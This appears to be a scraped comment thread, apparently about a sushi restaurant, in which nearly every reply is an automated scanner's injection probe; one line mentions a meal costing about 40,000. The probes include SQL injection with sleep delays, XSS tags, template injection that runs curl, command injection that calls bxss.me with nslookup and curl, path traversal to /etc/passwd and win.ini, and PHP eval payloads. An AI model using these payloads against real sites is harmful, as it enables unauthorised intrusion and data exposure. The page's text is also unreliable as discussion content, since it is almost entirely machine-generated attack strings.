'"()&%<zzz><ScRiPt >3202(9278)</ScRiPt>
re: ChuToroZuke
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitpqxasxfrzz3a0f3.bxss.me")}}
re: ChuToroZuke
'"()&%<zzz><ScRiPt >3202(9757)</ScRiPt>
re: ChuToroZuke
9689856
re: ChuToroZuke
cc987Yts
re: ChuToroZuke
*1
re: ChuToroZuke
*1
re: ChuToroZuke
*1
re: ChuToroZuke
*1
re: ChuToroZuke
-1 OR 5*5=25 --
re: ChuToroZuke
-1 OR 5*5=26 --
re: ChuToroZuke
-1 OR 5*5=25
re: ChuToroZuke
-1 OR 5*5=26
re: ChuToroZuke
*if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
-1 waitfor delay '0:0:15' --
re: ChuToroZuke
lfwlBfmM'; waitfor delay '0:0:15' --
re: ChuToroZuke
-1 OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1) OR 349=(SELECT 349 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 291=(SELECT 291 FROM PG_SLEEP(15))--
re: ChuToroZuke
9H60WxbD' OR 655=(SELECT 655 FROM PG_SLEEP(15))--
re: ChuToroZuke
Qj8O3LnZ') OR 987=(SELECT 987 FROM PG_SLEEP(15))--
re: ChuToroZuke
3zqI1fw8')) OR 633=(SELECT 633 FROM PG_SLEEP(15))--
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
'"
re: ChuToroZuke
@@Yw86u
re: ChuToroZuke
(select 198766*667891)
re: ChuToroZuke
(select 198766*667891 from DUAL)
@Guest It was a little over 40,000 including a glass of grape juice, water, and one add-on nigiri.
re: Just_Ingest
Q3OjVtuG
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+191-191-1=0+0+0+1
re: Just_Ingest
-1 OR 3+191-191-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
pV0jcrs9
re: Just_Ingest
1*
re: Just_Ingest
gxx8CK06'; waitfor delay '0:0:15' --
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+154-154-1=0+0+0+1
re: Just_Ingest
-1 OR 3+154-154-1=0+0+0+1
re: Just_Ingest
-5 OR 752=(SELECT 752 FROM PG_SLEEP(15))--
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
-5) OR 977=(SELECT 977 FROM PG_SLEEP(15))--
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
lhyJwKR1' OR 758=(SELECT 758 FROM PG_SLEEP(15))--
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
CKCo8bYz') OR 589=(SELECT 589 FROM PG_SLEEP(15))--
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
30q4ZuLa')) OR 327=(SELECT 327 FROM PG_SLEEP(15))--
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
rhwaqv5s'; waitfor delay '0:0:15' --
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
-5 OR 147=(SELECT 147 FROM PG_SLEEP(15))--
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
-5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: Just_Ingest
@@yUQXQ
re: Just_Ingest
-1)) OR 827=(SELECT 827 FROM PG_SLEEP(15))--
re: Just_Ingest
hMGc3osE' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: Just_Ingest
buubcZyS') OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: Just_Ingest
DyXE8hJa')) OR 760=(SELECT 760 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@tncHi
re: Just_Ingest
1nn0yvI8O
re: Just_Ingest
response.write(9804524*9131859)
re: Just_Ingest
'+response.write(9804524*9131859)+'
re: Just_Ingest
%0abcc:074625.67-14543.67.ef016.19990.2@bxss.me
re: Just_Ingest
"+response.write(9804524*9131859)+"
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-14544.67.ef016.19990.2@bxss.me
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
${9999402+9999719}
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
/etc/passwd
re: Just_Ingest
echo komvvq$()\ hjfknj\nz^xyu||a #' &echo komvvq$()\ hjfknj\nz^xyu||a #|" &echo komvvq$()\ hjfknj\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
&echo hiepxi$()\ fcyjgn\nz^xyu||a #' &echo hiepxi$()\ fcyjgn\nz^xyu||a #|" &echo hiepxi$()\ fcyjgn\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
|echo wovfaw$()\ glsgtr\nz^xyu||a #' |echo wovfaw$()\ glsgtr\nz^xyu||a #|" |echo wovfaw$()\ glsgtr\nz^xyu||a #
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
(nslookup hitptyvktohcb7d5ad.bxss.me||perl -e "gethostbyname('hitptyvktohcb7d5ad.bxss.me')")
re: Just_Ingest
)
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
$(nslookup hitjepojkxcsu0d8a5.bxss.me||perl -e "gethostbyname('hitjepojkxcsu0d8a5.bxss.me')")
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
&nslookup hitfgbijlcfvb54817.bxss.me&'\"`0&nslookup hitfgbijlcfvb54817.bxss.me&`'
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
&(nslookup hitisaunnbhnm3644e.bxss.me||perl -e "gethostbyname('hitisaunnbhnm3644e.bxss.me')")&'\"`0&(nslookup hitisaunnbhnm3644e.bxss.me||perl -e "gethostbyname('hitisaunnbhnm3644e.bxss.me')")&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
|(nslookup hitbwkgmyvbrqa997f.bxss.me||perl -e "gethostbyname('hitbwkgmyvbrqa997f.bxss.me')")
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
`(nslookup hitnifwrddnkib69aa.bxss.me||perl -e "gethostbyname('hitnifwrddnkib69aa.bxss.me')")`
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
;(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")|(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")&(nslookup hitdwuaerhpzrb31e9.bxss.me||perl -e "gethostbyname('hitdwuaerhpzrb31e9.bxss.me')")
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
/etc/shells
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
'.gethostbyname(lc('hitru'.'vmjigtaf3f633.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(103).chr(85).'
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
".gethostbyname(lc("hitrb"."gvbxzpnh951a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(72).chr(119).chr(71)."
re: Just_Ingest
bxss.me
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(112).concat(78).concat(100).concat(87)+(require"socket"
Socket.gethostbyname("hithr"+"vyzhxvocf38f5.bxss.me.")[3].to_s)+"
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(110).concat(69)+(require'socket'
Socket.gethostbyname('hittg'+'tweyfgql2a6f8.bxss.me.')[3].to_s)+'
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
'"
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
<!--
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+411-411-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+411-411-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+192-192-1=0+0+0+1
re: Just_Ingest
-1 OR 3+192-192-1=0+0+0+1
re: Just_Ingest
-1' OR 2+375-375-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+375-375-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+825-825-1=0+0+0+1 or 'IKFHVje1'='
re: Just_Ingest
-1' OR 3+825-825-1=0+0+0+1 or 'IKFHVje1'='
re: Just_Ingest
-1" OR 2+175-175-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+175-175-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
ltksSLWi'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 906=(SELECT 906 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: Just_Ingest
EFPmfnfR' OR 256=(SELECT 256 FROM PG_SLEEP(15))--
re: Just_Ingest
Tfu4g2Ys') OR 823=(SELECT 823 FROM PG_SLEEP(15))--
re: Just_Ingest
cbuK8KB5')) OR 645=(SELECT 645 FROM PG_SLEEP(15))--
re: Just_Ingest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@9a3kA
re: Just_Ingest
1BAG7OCH8A0
re: Just_Ingest
response.write(9576646*9166792)
re: Just_Ingest
'+response.write(9576646*9166792)+'
re: Just_Ingest
"+response.write(9576646*9166792)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999080+10000198}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../
re: Just_Ingest
)
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
redirtest.acx
re: Just_Ingest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Just_Ingest
echo nwuvll$()\ ubvwrv\nz^xyu||a #' &echo nwuvll$()\ ubvwrv\nz^xyu||a #|" &echo nwuvll$()\ ubvwrv\nz^xyu||a #
re: Just_Ingest
&echo ridqii$()\ sumhnf\nz^xyu||a #' &echo ridqii$()\ sumhnf\nz^xyu||a #|" &echo ridqii$()\ sumhnf\nz^xyu||a #
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Just_Ingest
|echo mtxvmo$()\ tahqrt\nz^xyu||a #' |echo mtxvmo$()\ tahqrt\nz^xyu||a #|" |echo mtxvmo$()\ tahqrt\nz^xyu||a #
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Just_Ingest
'.gethostbyname(lc('hitrb'.'vlseycgq19d37.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(88).chr(106).chr(90).'
re: Just_Ingest
expr 9000270392 - 927720
re: Just_Ingest
".gethostbyname(lc("hitto"."wdjarzqkf694f.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(85).chr(122).chr(71)."
re: Just_Ingest
/etc/shells
re: Just_Ingest
(nslookup -q=cname hitkvlabltxppe18f8.bxss.me||curl hitkvlabltxppe18f8.bxss.me))
re: Just_Ingest
gethostbyname(lc('hitnh'.'agaoqjho7560f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(72).chr(120).chr(77)
re: Just_Ingest
$(nslookup -q=cname hitqqegvbygycb6e9c.bxss.me||curl hitqqegvbygycb6e9c.bxss.me)
re: Just_Ingest
../../../../../../../../../../../../../../etc/shells
re: Just_Ingest
&nslookup -q=cname hitewtcfqejwm6b8ba.bxss.me&'\"`0&nslookup -q=cname hitewtcfqejwm6b8ba.bxss.me&`'
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
&(nslookup -q=cname hitkoppoqsvcwe13d2.bxss.me||curl hitkoppoqsvcwe13d2.bxss.me)&'\"`0&(nslookup -q=cname hitkoppoqsvcwe13d2.bxss.me||curl hitkoppoqsvcwe13d2.bxss.me)&`'
re: Just_Ingest
bxss.me
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
|(nslookup -q=cname hitzsfyabjcfu9e457.bxss.me||curl hitzsfyabjcfu9e457.bxss.me)
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
`(nslookup -q=cname hitirfuhjokvsba557.bxss.me||curl hitirfuhjokvsba557.bxss.me)`
re: Just_Ingest
http://bxss.me/t/fit.txt?.jpg
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
;(nslookup -q=cname hitmqoxlvjwop1564b.bxss.me||curl hitmqoxlvjwop1564b.bxss.me)|(nslookup -q=cname hitmqoxlvjwop1564b.bxss.me||curl hitmqoxlvjwop1564b.bxss.me)&(nslookup -q=cname hitmqoxlvjwop1564b.bxss.me||curl hitmqoxlvjwop1564b.bxss.me)
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
|(nslookup${IFS}-q${IFS}cname${IFS}hititjitylhqmb209f.bxss.me||curl${IFS}hititjitylhqmb209f.bxss.me)
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
